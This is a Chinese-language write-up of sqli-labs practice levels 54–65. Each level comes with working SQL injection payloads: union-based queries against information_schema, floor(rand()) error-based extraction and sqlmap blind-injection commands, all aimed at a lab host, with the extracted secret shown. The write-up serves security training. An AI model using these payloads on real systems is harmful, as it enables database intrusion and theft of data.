sqlilab-Less-54-65-writeup
Less-54 GET请求联合查询10步拿key 单引号
进行联合查询注入的时候需要注意,前期判断是否成功闭合,判断字段数,都是要确保后台数据库存在字段id的编号,这里测试可以写ID=1,2,3 写其他数字看不到效果,然后开始查表名等其他后续操作就可以写个不存在的id编号即可
判断闭合方式是否成功
?id=1'--+
判断字段数
?id=1' order by 3--+
?id=1' order by 4--+
确认可以注入的字段
?id=-1' union select 1,2,3 --+
根据显示的结果是可以通过2和3查看
查表名
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
显示结果:
Your Login name:2
Your Password:BROZHOX7ME
查字段名
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+
BROZHOX7ME ---> 16进制42524f5a484f58374d45 在线转换:https://www.bejson.com/convert/ox2str/
显示结果:
Your Login name:2
Your Password:id
sessid
secret_FDK5
tryy
查询字段值
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+
显示结果:
Your Login name:2
Your Password:oNf3esAKnoNVUbViCYCbGPzv
Less-55 GET请求联合查询14步拿key 小括号
跟Less-54一样的payload,拼合方式由单引号改成了小括号
判断闭合方式是否成功
?id=1)--+
http://106.54.35.126/Less-55/
?id=-1) union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
其他操作跟Less-54一样
Less-56 GET请求联合查询14步拿key 单引号 小括号
判断闭合方式是否成功
?id=1')--+
http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
其他操作跟Less-54一样
Less-57 GET请求联合查询14步拿key 双引号
判断闭合方式是否成功
?id=1"--+
http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+
Less-58 GET请求5步拿key 单引号
此关卡不能使用联合查询,因为用户输出的数组且被逆序了,所以使用报错注入效果显著
http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-59 GET请求5步拿key
跟Less-58一样,拼合方式是整型,不加单引号
http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-60 GET请求5步拿key
跟Less-58一样,拼合方式是双引号和小括号
http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-61 GET请求5步拿key
跟Less-58一样,拼合方式是单引号和双小括号
http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
Less-62 GET请求5步拿key
跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和一个小括号
使用sqlmap进行布尔型盲注
python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch
Less-63 GET请求5步拿key
跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号
使用sqlmap进行布尔型盲注
python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
Less-64 GET请求5步拿key
跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是双小括号
使用sqlmap进行布尔型盲注
python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
Less-65 GET请求5步拿key
跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和小括号
使用sqlmap进行布尔型盲注
python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch